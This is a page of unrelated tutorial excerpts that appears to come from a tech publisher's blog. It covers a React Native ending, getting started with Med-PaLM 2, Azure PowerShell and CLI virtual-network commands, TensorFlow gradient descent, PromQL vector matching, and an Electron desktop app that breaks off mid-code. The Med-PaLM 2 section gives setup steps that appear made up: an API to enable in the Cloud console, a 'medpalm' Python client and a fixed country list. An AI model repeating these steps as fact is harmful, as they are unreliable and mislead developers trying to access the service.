Just for variety, instead of using my mobile phone, as I did earlier in this article, I decided to use an emulated device. After starting the application with npm start, I started my device, and the app soon appeared. If the user touches the <Picker> element, a popup is displayed, listing the countries that were received from our Node server. When the user actually taps on a country, the onValueChange event is fired, and after calling the server, the list of regions is displayed. Everything works, and is using native components; great! By the way, if you were not very sure about the selectedValue problem we described, just omit that prop: when the user picks a country, the selected value won't be shown onscreen.

This article walked you through the installation and setup process of React Native and other development tools for developing the mobile version of a web app. If you found this post useful, do check out the book Modern JavaScript Web Development Cookbook. You will learn how to create native mobile applications for Android and iOS with React Native, build client-side web applications using React and Redux, and much more.

React Native 0.59 RC0 is now out with React Hooks, and more

The React Native team shares their open source roadmap, React Suite hits 3.4.0

How to create a desktop application with Electron [Tutorial]

Getting Started with Med-PaLM 2

07 Sep 2023
5 min read
Introduction

Med-PaLM 2 is a large language model (LLM) from Google Research, designed for the medical domain. It is trained on a massive dataset of text and code, including medical journals, textbooks, and clinical trials. Med-PaLM 2 can answer questions about a wide range of medical topics, including diseases, treatments, and procedures. It can also generate text, translate languages, and write different kinds of creative content.

Use Cases

Med-PaLM 2 can be used for a variety of purposes in the healthcare industry, including:

Medical research: Med-PaLM 2 can be used to help researchers find and analyze medical data. It can also be used to generate hypotheses and test new ideas.

Clinical decision support: Med-PaLM 2 can be used to help doctors diagnose diseases and make treatment decisions. It can also be used to provide patients with information about their condition and treatment options.

Health education: Med-PaLM 2 can be used to create educational materials for patients and healthcare professionals. It can also be used to answer patients' questions about their health.

Drug discovery: Med-PaLM 2 can be used to help researchers identify new drug targets and develop new drugs.

Personalized medicine: Med-PaLM 2 can be used to help doctors personalize treatment for individual patients. It can do this by taking into account the patient's medical history, genetic makeup, and other factors.

How to Get Started

Med-PaLM 2 is currently available to a limited number of Google Cloud customers. To get started, you can visit the Google Cloud website (https://cloud.google.com/) and sign up for a free trial. Once you have a Google Cloud account, you can request access to Med-PaLM 2. Here are the steps for getting started with Med-PaLM:

1. Check if Med-PaLM is available in your country. Med-PaLM is currently only available in the following countries: United States, Canada, United Kingdom, Australia, New Zealand, Singapore, India, Japan, and South Korea. You can check the Med-PaLM website (https://sites.research.google/med-palm/) for the latest list of supported countries.

2. Create a Google Cloud Platform (GCP) account. Med-PaLM is a cloud-based service, so you will need to create a GCP account in order to use it. You can do this by going to the GCP website (https://cloud.google.com/) and clicking on the "Create Account" button.

3. Enable the Med-PaLM API. Once you have created a GCP account, you will need to enable the Med-PaLM API. You can do this by going to the API Library (https://console.cloud.google.com/apis/library) and searching for "Med-PaLM". Click on the "Enable" button to enable the API.

4. Create a Med-PaLM service account. A service account is a special type of account that can be used to access GCP resources. You will need to create a service account in order to use Med-PaLM. You can do this by going to the IAM & Admin page (https://console.cloud.google.com/iam-admin/) and clicking on the "Create Service Account" button.

5. Download the Med-PaLM credentials. Once you have created a service account, you will need to download the credentials: a JSON file that contains your service account's email address and private key. You can download the credentials by clicking on the "Download JSON" button.

6. Set up the Med-PaLM client library. There are client libraries available for a variety of programming languages. You will need to install the client library for the language that you are using.
You can find the client libraries on the Med-PaLM website (https://sites.research.google/med-palm/).

7. Initialize the Med-PaLM client. Once you have installed the client library, you can initialize the Med-PaLM client. The client will need your service account's email address and private key in order to authenticate with Med-PaLM. You can initialize the client by using the following code:

import medpalm

client = medpalm.Client(
    email="your_service_account_email_address",
    key_file="your_service_account_private_key.json"
)

8. Start using Med-PaLM! Once you have initialized the Med-PaLM client, you can start using it to access Med-PaLM's capabilities. For example, you can use Med-PaLM to answer medical questions, generate text, and translate languages.

Key Features

Med-PaLM 2 has a number of key features that make it a valuable tool for the healthcare industry. These features include:

Accuracy: Med-PaLM 2 is highly accurate in answering medical questions. It has been shown to achieve an accuracy of 85% on a variety of medical question answering datasets.

Expertise: Med-PaLM 2 is trained on a massive dataset of medical text and code. This gives it a deep understanding of medical concepts and terminology.

Versatility: Med-PaLM 2 can be used for a variety of purposes in the healthcare industry. It can answer questions, generate text, translate languages, and write different kinds of creative content.

Scalability: Med-PaLM 2 is scalable and can be used to process large amounts of data. This makes it a valuable tool for research and clinical applications.

Conclusion

Med-PaLM 2 is a powerful LLM that has the potential to revolutionize the healthcare industry. It can be used to improve medical research, clinical decision support, health education, drug discovery, and personalized medicine. Med-PaLM 2 is still under development, but it has already demonstrated the potential to make a significant impact on healthcare.

Automate tasks using Azure PowerShell and Azure CLI [Tutorial]

Gebin George
12 Jul 2018
5 min read
It is no surprise that we commonly face repetitive and time-consuming tasks. For example, you might want to create multiple storage accounts; you would have to follow the same steps multiple times to get your job done. This is why Microsoft supports its Azure services with multiple ways of automating most of the tasks that can be implemented in Azure. In this Azure PowerShell tutorial, we will learn how to automate redundant tasks on the Azure cloud. This article is an excerpt from the book Hands-On Networking with Azure, written by Mohamed Waly.

Azure PowerShell

PowerShell is commonly used with most Microsoft products, and Azure is no less important than any of these products. You can use Azure PowerShell cmdlets to manage Azure networking tasks; however, you should be aware that Microsoft Azure has two types of cmdlets, one for the ASM model and another for the ARM model. The main difference between cmdlets of the ASM model and the ARM model is that an RM is added to the cmdlets of the current portal. For example, if you want to create an ASM virtual network, you would use the following cmdlet:

New-AzureVirtualNetwork

But for the ARM model, you would use the following:

New-AzureRMVirtualNetwork

Often, this would be the case, but a few cmdlets are totally different, and some others don't exist in the ASM model at all but do exist in the ARM model. By default, you can use Azure PowerShell cmdlets in Windows PowerShell, but you will have to install its module first.

Installing the Azure PowerShell module

There are two ways of installing the Azure PowerShell module on Windows:

Download and install the module from the following link: https://www.microsoft.com/web/downloads/platform.aspx

Install the module from PowerShell Gallery

Installing the Azure PowerShell module from PowerShell Gallery

The following are the required steps to get Azure PowerShell installed:

Open PowerShell in an elevated mode.

To install the Azure PowerShell module for the current portal, run the cmdlet Install-Module AzureRM.

If your PowerShell requires a NuGet provider, you will be asked to agree to install it, and you will have to agree to the installation policy modification, as the repository is not available in your environment.

Creating a virtual network in the Azure portal using PowerShell

To be able to run your PowerShell cmdlets against Azure successfully, you need to log in first to Azure using the following cmdlet:

Login-AzureRMAccount

Then, you will be prompted to enter the credentials of your Azure account. Voila! You are logged in and you can run Azure PowerShell cmdlets successfully.

To create an Azure VNet, you first need to create the subnets that will be attached to this virtual network. Therefore, let's get started by creating the subnets:

$NSubnet = New-AzureRMVirtualNetworkSubnetConfig -Name NSubnet -AddressPrefix 192.168.1.0/24
$GWSubnet = New-AzureRMVirtualNetworkSubnetConfig -Name GatewaySubnet -AddressPrefix 192.168.2.0/27

Now you are ready to create a virtual network by triggering the following cmdlet:

New-AzureRMVirtualNetwork -ResourceGroupName PacktPub -Location WestEurope -Name PSVNet -AddressPrefix 192.168.0.0/16 -Subnet $NSubnet,$GWSubnet

Congratulations! You have your virtual network up and running with two subnets associated to it, one of which is a gateway subnet.
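PowerShell and the CLI are not the only ways to script this; the same deployment can be driven from Python with the Azure SDK. The following is a hedged sketch, assuming the azure-identity and azure-mgmt-network packages and a recent (track 2) SDK version; the subscription ID is a placeholder, and the resource names mirror the PowerShell example above:

from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient

# Authenticate with whatever credential is available in the environment
# (Azure CLI login, environment variables, managed identity, and so on).
credential = DefaultAzureCredential()
client = NetworkManagementClient(credential, "<subscription-id>")

# Create the same VNet as the PowerShell example: one regular subnet
# plus a gateway subnet. begin_* calls return a poller for the
# long-running operation.
poller = client.virtual_networks.begin_create_or_update(
    "PacktPub",   # resource group
    "PSVNet",     # virtual network name
    {
        "location": "westeurope",
        "address_space": {"address_prefixes": ["192.168.0.0/16"]},
        "subnets": [
            {"name": "NSubnet", "address_prefix": "192.168.1.0/24"},
            {"name": "GatewaySubnet", "address_prefix": "192.168.2.0/27"},
        ],
    },
)
vnet = poller.result()
print(vnet.name, vnet.provisioning_state)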
Adding address space to a virtual network using PowerShell

To add an address space to a virtual network, you need to retrieve the virtual network first and store it in a variable by running the following cmdlet:

$VNet = Get-AzureRMVirtualNetwork -ResourceGroupName PacktPub -Name PSVNet

Then, you can add the address space by running the following cmdlet:

$VNet.AddressSpace.AddressPrefixes.Add("10.1.0.0/16")

Finally, you need to save the changes you have made by running the following cmdlet:

Set-AzureRmVirtualNetwork -VirtualNetwork $VNet

Azure CLI

Azure CLI is an open source, cross-platform tool that supports implementing all the tasks you can do in the Azure portal, with commands. Azure CLI comes in two flavors:

Azure CLI 2.0: supports only the current Azure portal

Azure CLI 1.0: supports both portals

Throughout this book, we will be using Azure CLI 2.0, so let's get started with its installation.

Installing Azure CLI 2.0

Perform the following steps to install Azure CLI 2.0:

Download Azure CLI 2.0 from the following link: https://azurecliprod.blob.core.windows.net/msi/azure-cli-2.0.22.msi

Once downloaded, you can start the installation. Once you click on Install, it will start to validate your environment to check whether it is compatible, and then the installation starts. Once the installation completes, you can click on Finish, and you are good to go. Once done, you can open cmd and enter az to access Azure CLI commands.

Creating a virtual network using Azure CLI 2.0

To create a virtual network using Azure CLI 2.0, you have to follow these steps:

Log in to your Azure account using the command az login; you have to open the URL that pops up on the CLI and then enter the code displayed.

To create a new virtual network, you need to run the following command:

az network vnet create --name CLIVNet --resource-group PacktPub --location westeurope --address-prefix 192.168.0.0/16 --subnet-name s1 --subnet-prefix 192.168.1.0/24

Adding a gateway subnet to a virtual network using Azure CLI 2.0

To add a gateway subnet to a virtual network, you need to run the following command:

az network vnet subnet create --address-prefix 192.168.7.0/27 --name GatewaySubnet --resource-group PacktPub --vnet-name CLIVNet

Adding an address space to a virtual network using Azure CLI 2.0

To add an address space to a virtual network, you can run the following command:

az network vnet update address-prefixes --add <Add JSON String>

Remember that you will need to add a JSON string that describes the address space.

To summarize, we learned how to automate cloud tasks using PowerShell and Azure CLI. Check out the book Hands-On Networking with Azure to learn how to build large-scale, real-world apps using Azure networking solutions.

Creating Multitenant Applications in Azure

Fine Tune Your Web Application by Profiling and Automation

Putting Your Database at the Heart of Azure Solutions

Implementing gradient descent algorithm to solve optimization problems

Sunith Shetty
22 Feb 2018
7 min read
This article is an excerpt from a book written by Rajdeep Dua and Manpreet Singh Ghotra titled Neural Network Programming with TensorFlow. In this book, you will learn to leverage the power of TensorFlow to train neural networks of varying complexities, without any hassle.

Today we will focus on the gradient descent algorithm and its different variants. We will take a simple example of linear regression to solve the optimization problem. Gradient descent is the most successful optimization algorithm. As mentioned earlier, it is used to do weight updates in a neural network so that we minimize the loss function. Let's now talk about an important neural network method called backpropagation, in which we first propagate forward and calculate the dot product of inputs with their corresponding weights, then apply an activation function to the sum of products, which transforms the input to an output and adds non-linearities to the model, enabling the model to learn almost any arbitrary functional mapping. Later, we backpropagate through the neural network, carrying error terms and updating weight values using gradient descent, as shown in the following graph:

Different variants of gradient descent

Standard gradient descent, also known as batch gradient descent, will calculate the gradient of the whole dataset but will perform only one update. Therefore, it can be quite slow and hard to control for datasets which are extremely large and don't fit in memory. Let's now look at algorithms that can solve this problem.

Stochastic gradient descent (SGD) performs a parameter update on each training example, whereas mini-batch gradient descent performs an update with n training examples in each batch. The issue with SGD is that, due to the frequent updates and fluctuations, convergence to the exact minimum is complicated, and it will keep overshooting due to the regular fluctuations. Mini-batch gradient descent comes to the rescue here; it reduces the variance in the parameter updates, leading to a much better and more stable convergence. SGD and mini-batch are often used interchangeably.

Overall problems with gradient descent include choosing a proper learning rate, so that we avoid slow convergence at small values or divergence at larger values, and applying the same learning rate to all parameter updates, whereas if the data is sparse we might not want to update all parameters to the same extent. Lastly, there is the problem of dealing with saddle points.

Algorithms to optimize gradient descent

We will now look at various methods for optimizing gradient descent in order to calculate different learning rates for each parameter, calculate momentum, and prevent decaying learning rates.

To solve the problem of high-variance oscillation in SGD, a method called momentum was discovered; this accelerates SGD by navigating along the appropriate direction and softening the oscillations in irrelevant directions. Basically, it adds a fraction of the update vector of the past step to the current update vector. The momentum value is usually set to 0.9. Momentum leads to faster and more stable convergence with reduced oscillations.

Nesterov accelerated gradient addresses a weakness of momentum: as we reach the minima, that is, the lowest point on the curve, momentum is quite high, and the optimizer doesn't know to slow down at that point; the large momentum could cause it to miss the minima entirely and continue moving up.
Nesterov proposed that we first make a long jump based on the previous momentum, then calculate the gradient, and then make a correction which results in a parameter update. This update prevents us from going too fast and missing the minima, and makes the method more responsive to changes.

Adagrad allows the learning rate to adapt based on the parameters. It performs large updates for infrequent parameters and small updates for frequent parameters, and is therefore very well suited to dealing with sparse data. Its main flaw is that its learning rate is always decreasing and decaying.

The problem of decaying learning rates is solved by AdaDelta. AdaDelta solves the problem of the ever-decreasing learning rate in AdaGrad. In AdaGrad, the learning rate is divided by the square root of the accumulated sum of squared gradients; at each stage, another squared gradient is added to the sum, so the effective learning rate decreases constantly. Instead of summing all prior squared gradients, AdaDelta uses a sliding window, which allows the accumulated sum to decrease.

Adaptive Moment Estimation (Adam) computes adaptive learning rates for each parameter. Like AdaDelta, Adam stores a decaying average of past squared gradients, but it additionally stores the momentum change for each parameter. Adam works well in practice and is one of the most used optimization methods today.

The following two images (image credit: Alec Radford) show the optimization behavior of the algorithms described earlier. We see their behavior on the contours of a loss surface over time. Adagrad, RMSprop, and Adadelta head off in the right direction almost immediately and converge fast, whereas momentum and NAG are headed off-track. NAG is soon able to correct its course due to its improved responsiveness, by looking ahead and heading toward the minimum.

The second image displays the behavior of the algorithms at a saddle point. SGD, momentum, and NAG find it challenging to break symmetry, but slowly they manage to escape the saddle point, whereas Adagrad, Adadelta, and RMSprop head down the negative slope, as can be seen in the following image:

Which optimizer to choose

In the case that the input data is sparse, or if we want fast convergence while training complex neural networks, we get the best results using adaptive learning rate methods. We also don't need to tune the learning rate. For most cases, Adam is usually a good choice.

Optimization with an example

Let's take an example of linear regression, where we try to find the best fit for a straight line through a number of data points by minimizing the squares of the distances from the line to each data point. This is why we call it least squares regression. Essentially, we are formulating the problem as an optimization problem, where we are trying to minimize a loss function.
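Before writing the code, it helps to pin the objective down symbolically. In standard notation (illustrative, not the book's own), the least-squares loss for a linear model and the gradient descent update that every variant above builds on are:

L(W, b) = \frac{1}{n} \sum_{i=1}^{n} \left( y_i - (W x_i + b) \right)^2

\theta_{t+1} = \theta_t - \eta \, \nabla_{\theta} L(\theta_t)

Batch gradient descent, SGD, and mini-batch gradient descent differ only in how many of the n terms are used to estimate the gradient at each update.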
Let's set up the input data and look at the scatter plot. The imports, and the X and y placeholders that the training loop feeds later, are included here so that the snippets are self-contained:

import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt

# input data
xData = np.arange(100, step=.1)
yData = xData + 20 * np.sin(xData/10)

Define the data size and batch size:

# define the data size and batch size
nSamples = 1000
batchSize = 100

We will need to resize the data to meet the TensorFlow input format, as follows:

# resize input for tensorflow
xData = np.reshape(xData, (nSamples, 1))
yData = np.reshape(yData, (nSamples, 1))

# placeholders that will be fed with mini-batches at training time
X = tf.placeholder(tf.float32, shape=(None, 1))
y = tf.placeholder(tf.float32, shape=(None, 1))

The following scope initializes the weights and bias, and describes the linear model and loss function:

with tf.variable_scope("linear-regression-pipeline"):
    W = tf.get_variable("weights", (1, 1), initializer=tf.random_normal_initializer())
    b = tf.get_variable("bias", (1,), initializer=tf.constant_initializer(0.0))

    # model
    yPred = tf.matmul(X, W) + b

    # loss function
    loss = tf.reduce_sum((y - yPred)**2 / nSamples)

We then set an optimizer for minimizing the loss; the commented-out lines show the other optimizers discussed earlier:

# set the optimizer
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)
#optimizer = tf.train.AdamOptimizer(learning_rate=.001).minimize(loss)
#optimizer = tf.train.AdadeltaOptimizer(learning_rate=.001).minimize(loss)
#optimizer = tf.train.AdagradOptimizer(learning_rate=.001).minimize(loss)
#optimizer = tf.train.MomentumOptimizer(learning_rate=.001, momentum=0.9).minimize(loss)
#optimizer = tf.train.FtrlOptimizer(learning_rate=.001).minimize(loss)
optimizer = tf.train.RMSPropOptimizer(learning_rate=.001).minimize(loss)

We then select mini-batches and run the optimizer:

errors = []
with tf.Session() as sess:
    # init variables
    sess.run(tf.global_variables_initializer())

    for _ in range(1000):
        # select mini batch
        indices = np.random.choice(nSamples, batchSize)
        xBatch, yBatch = xData[indices], yData[indices]
        # run optimizer
        _, lossVal = sess.run([optimizer, loss], feed_dict={X: xBatch, y: yBatch})
        errors.append(lossVal)

# plot a moving average of the loss (save before show, so the file isn't blank)
plt.plot([np.mean(errors[i-50:i]) for i in range(len(errors))])
plt.savefig("errors.png")
plt.show()

The output of the preceding code is a sliding curve of the smoothed training error.

We learned that optimization is a complicated subject, and a lot depends on the nature and size of our data. Also, optimization depends on the weight matrices. A lot of these optimizers are trained and tuned for tasks like image classification or prediction. However, for custom or new use cases, we need to perform trial and error to determine the best solution. To know more about how to build and optimize neural networks using TensorFlow, do check out the book Neural Network Programming with TensorFlow.

Mastering PromQL: A Comprehensive Guide to Prometheus Query Language

Rob Chapman, Peter Holmes
07 Nov 2024
15 min read
This article is an excerpt from the book, "Observability with Grafana", by Rob Chapman, Peter Holmes. This book provides a holistic understanding of observability concepts using the Grafana Labs tools, teaching you how to fully leverage the LGTM stack.

Introduction

PromQL, or Prometheus Query Language, is a powerful tool designed to work with Prometheus, an open-source systems monitoring and alerting toolkit. Initially developed by SoundCloud in 2012 and later accepted by the Cloud Native Computing Foundation in 2016, Prometheus has become a crucial component of modern infrastructure monitoring. PromQL allows users to query data stored in Prometheus, enabling the creation of insightful dashboards and the setting up of alerts based on the performance metrics of applications and systems. This article will explore the core functionalities of PromQL, including how it interacts with metrics data and how it can be used to effectively monitor and analyze system performance.

Introducing PromQL

Prometheus was initially developed by SoundCloud in 2012; the project was accepted by the Cloud Native Computing Foundation in 2016 as the second incubated project (after Kubernetes), and version 1.0 was released shortly after. PromQL is an integral part of Prometheus, which is used to query stored data and produce dashboards and alerts.

Before we delve into the details of the language, let's briefly look at the following ways in which Prometheus-compatible systems interact with metrics data:

Ingesting metrics: Prometheus-compatible systems accept a timestamp, key-value labels, and a sample value. As the details of the Prometheus Time Series Database (TSDB) are quite complicated, the following diagram shows a simplified example of how an individual sample for a metric is stored once it has been ingested:

Figure 5.1 – A simplified view of metric data stored in the TSDB

The labels or dimensions of a metric: Prometheus labels provide metadata to identify data of interest. These labels create metrics, time series, and samples:

* Each unique __name__ value creates a metric. In the preceding figure, the metric is app_frontend_requests.
* Each unique set of labels creates a time series. In the preceding figure, the set of all labels is the time series.
* A time series will contain multiple samples, each with a unique timestamp. The preceding figure shows a single sample, but over time, multiple samples will be collected for each time series.
* The number of unique values for a metric label is referred to as the cardinality of the label. Highly cardinal labels should be avoided, as they significantly increase the storage costs of the metric.

The following diagram shows a single metric containing two time series and five samples:

Figure 5.2 – An example of samples from multiple time series

In Grafana, we can see a representation of the time series and samples from a metric. To do this, follow these steps:

1. In your Grafana instance, select Explore in the menu.
2. Choose your Prometheus data source, which will be labeled as grafanacloud-<team>prom (default).
3. In the Metric dropdown, choose app_frontend_requests_total, and under Options, set Format to Table, and then click on Run query. This will show you all the samples and time series in the metric over the selected time range. You should see data like this:

Figure 5.3 – Visualizing the samples and time series that make up a metric

Now that we understand the data structure, let's explore PromQL.
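Before digging into the feature set, it helps to see what queries over such a metric look like in practice. These are illustrative snippets only; app_frontend_requests_total comes from the example above, while the label matcher value is hypothetical:

# Instant vector: the latest sample of every time series for the metric
app_frontend_requests_total

# Narrow the selection with a label matcher (hypothetical label value)
app_frontend_requests_total{status="500"}

# Range vector: all samples from the last five minutes, per time series
app_frontend_requests_total[5m]

# A typical use of a range vector: per-second request rate over five minutes
rate(app_frontend_requests_total[5m])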
An overview of PromQL features

In this section, we will take you through the features that PromQL has. We will start with an explanation of the data types, and then we will look at how to select data, how to work on multiple datasets, and how to use functions. As PromQL is a query language, it's important to know how to manipulate data to produce alerts and dashboards.

Data types

PromQL offers three data types, which are important, as the functions and operators in PromQL will work differently depending on the data types presented:

Instant vectors are a data type that stores a set of time series containing a single sample, all sharing the same timestamp; that is, it presents values at a specific instant in time:

Figure 5.4 – An instant vector

Range vectors store a set of time series, each containing a range of samples with different timestamps:

Figure 5.5 – Range vectors

Scalars are simple numeric values, with no labels or timestamps involved.

Selecting data

PromQL offers several tools for you to select data to show in a dashboard or a list, or just to understand a system's state. Some of these are described in the following table:

Table 5.1 – The selection operators available in PromQL

In addition to the operators that allow us to select data, PromQL offers a selection of operators to compare multiple sets of data.

Operators between two datasets

Some data is easily provided by a single metric, while other useful information needs to be created from multiple metrics. The following operators allow you to combine datasets.

Table 5.2 – The comparison operators available in PromQL

Vector matching is an initially confusing topic; to clarify it, let's consider examples for the three cases of vector matching: one-to-one, one-to-many/many-to-one, and many-to-many.

By default, when combining vectors, all label names and values are matched. This means that for each element of the vector, the operator will try to find a single matching element from the second vector. Let's consider a simple example:

Vector A:
    10{color=blue,smell=ocean}
    31{color=red,smell=cinnamon}
    27{color=green,smell=grass}

Vector B:
    19{color=blue,smell=ocean}
    8{color=red,smell=cinnamon}
    14{color=green,smell=jungle}

A{} + B{}:
    29{color=blue,smell=ocean}
    39{color=red,smell=cinnamon}

A{} + on (color) B{} or A{} + ignoring (smell) B{}:
    29{color=blue}
    39{color=red}
    41{color=green}

When color=blue and smell=ocean, A{} + B{} gives 10 + 19 = 29, and when color=red and smell=cinnamon, A{} + B{} gives 31 + 8 = 39. The other elements have no match between the two vectors, so they are ignored. When we sum the vectors using on (color), we only match on the color label; now the two green elements match and are summed, giving 27 + 14 = 41.

This example works when there is a one-to-one relationship of labels between vector A and vector B. However, sometimes there may be a many-to-one or one-to-many relationship; that is, vector A or vector B may have more than one element that matches the other vector. In these cases, Prometheus will give an error, and grouping syntax must be used. Let's look at another example to illustrate this:

Vector A:
    7{color=blue,smell=ocean}
    5{color=red,smell=cinnamon}
    2{color=blue,smell=powder}

Vector B:
    20{color=blue,smell=ocean}
    8{color=red,smell=cinnamon}
    14{color=green,smell=jungle}

A{} + on (color) group_left B{}:
    27{color=blue,smell=ocean}
    13{color=red,smell=cinnamon}
    22{color=blue,smell=powder}

Now, we have two different elements in vector A with color=blue.
The group_left modifier will use the labels from vector A but only match on color. This leads to the third element of the combined vector having a value of 22 (2 + 20), even though the matching item in vector B has a different smell. The group_right modifier behaves in the opposite direction.

The final option is a many-to-many vector match. These matches use the logical operators and, unless, and or to combine parts of vectors A and B. Let's see some examples:

Vector A:
    10{color=blue,smell=ocean}
    31{color=red,smell=cinnamon}
    27{color=green,smell=grass}

Vector B:
    19{color=blue,smell=ocean}
    8{color=red,smell=cinnamon}
    14{color=green,smell=jungle}

A{} and B{}:
    10{color=blue,smell=ocean}
    31{color=red,smell=cinnamon}

A{} unless B{}:
    27{color=green,smell=grass}

A{} or B{}:
    10{color=blue,smell=ocean}
    31{color=red,smell=cinnamon}
    27{color=green,smell=grass}
    14{color=green,smell=jungle}

Unlike the previous examples, no mathematical operators are being used here: for and and unless, the values returned are the values from vector A for the elements that satisfy the logical condition; for or, the unmatched elements of vector B are also returned, with their own values.

Conclusion

PromQL is an essential component of Prometheus, offering users a flexible and powerful means of querying and analyzing time-series data. By understanding its data types and operators, users can craft complex queries that provide deep insights into system performance. The language supports a variety of data selection and comparison operations, allowing for precise monitoring and alerting. Whether working with instant vectors, range vectors, or scalars, PromQL enables developers and operators to optimize their use of Prometheus for monitoring and alerting, ensuring systems remain performant and reliable. As organizations continue to embrace cloud-native architectures, mastering PromQL becomes increasingly vital for maintaining robust and efficient systems.

Author Bio

Rob Chapman is a creative IT engineer and founder at The Melt Cafe, with two decades of experience in the full application life cycle. Working over the years for companies such as the Environment Agency, BT Global Services, Microsoft, and Grafana, Rob has built a wealth of experience on large complex systems. More than anything, Rob loves saving energy, time, and money and has a track record for bringing production-related concerns forward so that they are addressed earlier in the development cycle, when they are cheaper and easier to solve. In his spare time, Rob is a Scout leader, and he enjoys hiking, climbing, and, most of all, spending time with his family and six children.

Peter Holmes is a senior engineer with a deep interest in digital systems and how to use them to solve problems. With over 16 years of experience, he has worked in various roles in operations. Working at organizations such as Boots UK, Fujitsu Services, Anaplan, Thomson Reuters, and the NHS, he has experience in complex transformational projects, site reliability engineering, platform engineering, and leadership. Peter has a history of taking time to understand the customer and ensuring Day-2+ operations are as smooth and cost-effective as possible.

How to create a desktop application with Electron [Tutorial]

Bhagyashree R
06 Feb 2019
15 min read
Electron is an open source framework, created by GitHub, that lets you develop desktop executables that bring together Node and Chrome to provide a full GUI experience. Electron has been used for several well-known projects, including developer tools such as Visual Studio Code, Atom, and Light Table. Basically, you can define the UI with HTML, CSS, and JS (or using React, as we'll be doing), but you can also use all of the packages and functions in Node. So, you won't be limited to a sandboxed experience, being able to go beyond what you could do with just a browser.

This article is taken from the book Modern JavaScript Web Development Cookbook by Federico Kereki. This problem-solving guide teaches you popular problem-solving techniques for JavaScript on servers, browsers, mobile phones, and desktops. To follow along with the examples implemented in this article, you can download the code from the book's GitHub repository.

In this article, we will look at how we can use Electron together with tools like React and Node to create a native desktop application, which you can distribute to users.

Setting up Electron

We will start with installing Electron, and then in the later recipes, we'll see how we can turn a React app into a desktop program. You can install Electron by executing the following command:

npm install electron --save-dev

Then, we'll need a starter JS file. Taking some tips from the main.js file, we'll create the following electron-start.js file:

// Source file: electron-start.js
/* @flow */
const { app, BrowserWindow } = require("electron");

let mainWindow;

const createWindow = () => {
  mainWindow = new BrowserWindow({ height: 768, width: 1024 });
  mainWindow.loadURL("http://localhost:3000");
  mainWindow.on("closed", () => {
    mainWindow = null;
  });
};

app.on("ready", createWindow);
app.on("activate", () => mainWindow === null && createWindow());
app.on(
  "window-all-closed",
  () => process.platform !== "darwin" && app.quit()
);

Here are some points to note regarding the preceding code snippet:

- This code runs in Node, so we are using require() instead of import.
- The mainWindow variable will point to the browser instance where our code will run.
- We'll start by running our React app, so Electron will be able to load the code from http://localhost:3000.

In our code, we also have to process the following events:

- "ready" is called when Electron has finished its initialization and can start creating windows.
- "closed" means your window was closed; your app might have several windows open, so at this point, you should delete the closed one.
- "window-all-closed" implies your whole app was closed. In Windows and Linux, this means quitting, but for macOS, you don't usually quit applications, because of Apple's usual rules.
- "activate" is called when your app is reactivated, so if the window had been deleted (as in Windows or Linux), you have to create it again.

We already have our React app (you can find the React app in the GitHub repository) in place, so we just need a way to call Electron. Add the following script to package.json, and you'll be ready:

"scripts": {
    "electron": "electron .",
    . . .

How it works...

To run the Electron app in development mode, we have to do the following:

1. Run our restful_server_cors server code from the GitHub repository.
2. Start the React app, which requires the server to be running.
3. Wait until it's loaded, and then, and only then, move on to the next step.
4. Start Electron.
So, basically, you'll have to run the following two commands, but you'll need to do so in separate terminals:

// in the directory for our restful server:
node out/restful_server_cors.js

// in the React app directory:
npm start

// and after the React app is running, in another terminal:
npm run electron

After starting Electron, a screen quickly comes up, and we again find our countries and regions app, now running independently of a browser. The app works as always; as an example, I selected a country, Canada, and correctly got its list of regions. We are done! You can see that everything is interconnected, as before, in the sense that if you make any changes to the React source code, they will be instantly reflected in the Electron app.

Adding Node functionality to your app

In the previous recipe, we saw that with just a few small configuration changes, we can turn our web page into an application. However, you're still restricted in terms of what you can do, because you are still using only those features available in a sandboxed browser window. You don't have to think this way, for you can add basically all Node functionality using functions that let you go beyond the limits of the web. Let's see how to do it in this recipe.

How to do it

We want to add some functionality to our app of the kind that a typical desktop app would have. The key to adding Node functions to your app is to use the remote module in Electron. With it, your browser code can invoke methods of the main process, and thus gain access to extra functionality.

Let's say we wanted to add the possibility of saving the list of a country's regions to a file. We'd require access to the fs module to be able to write a file, and we'd also need to open a dialog box to select what file to write to. In our serviceApi.js file, we would add the following functions:

// Source file: src/regionsApp/serviceApi.js
/* @flow */
const electron = window.require("electron").remote;
. . .
const fs = electron.require("fs");

export const writeFile = fs.writeFile.bind(fs);
export const showSaveDialog = electron.dialog.showSaveDialog;

Having added this, we can now write files and show dialog boxes from our main code. To use this functionality, we could add a new action to our world.actions.js file:

// Source file: src/regionsApp/world.actions.js
/* @flow */
import {
    getCountriesAPI,
    getRegionsAPI,
    showSaveDialog,
    writeFile
} from "./serviceApi";
. . .
export const saveRegionsToDisk = () => async (
    dispatch: ({}) => any,
    getState: () => { regions: [] }
) => {
    showSaveDialog((filename: string = "") => {
        if (filename) {
            writeFile(filename, JSON.stringify(getState().regions), e =>
                e && window.console.log(`ERROR SAVING ${filename}`, e)
            );
        }
    });
};

When the saveRegionsToDisk() action is dispatched, it will show a dialog to prompt the user to select what file is to be written, and will then write the current set of regions, taken from getState().regions, to the selected file in JSON format.
We just have to add the appropriate button to our <RegionsTable> component to be able to dispatch the necessary action:

// Source file: src/regionsApp/regionsTableWithSave.component.js
/* @flow */
import React from "react";
import PropTypes from "prop-types";

import "../general.css";

export class RegionsTable extends React.PureComponent<{
    loading: boolean,
    list: Array<{
        countryCode: string,
        regionCode: string,
        regionName: string
    }>,
    saveRegions: () => void
}> {
    static propTypes = {
        loading: PropTypes.bool.isRequired,
        list: PropTypes.arrayOf(PropTypes.object).isRequired,
        saveRegions: PropTypes.func.isRequired
    };

    static defaultProps = {
        list: []
    };

    render() {
        if (this.props.list.length === 0) {
            return <div className="bordered">No regions.</div>;
        } else {
            const ordered = [...this.props.list].sort(
                (a, b) => (a.regionName < b.regionName ? -1 : 1)
            );

            return (
                <div className="bordered">
                    {ordered.map(x => (
                        <div key={x.countryCode + "-" + x.regionCode}>
                            {x.regionName}
                        </div>
                    ))}
                    <div>
                        <button onClick={() => this.props.saveRegions()}>
                            Save regions to disk
                        </button>
                    </div>
                </div>
            );
        }
    }
}

We are almost done! When we connect this component to the store, we'll simply add the new action, as follows:

// Source file: src/regionsApp/regionsTableWithSave.connected.js
/* @flow */
import { connect } from "react-redux";

import { RegionsTable } from "./regionsTableWithSave.component";
import { saveRegionsToDisk } from "./world.actions";

const getProps = state => ({
    list: state.regions,
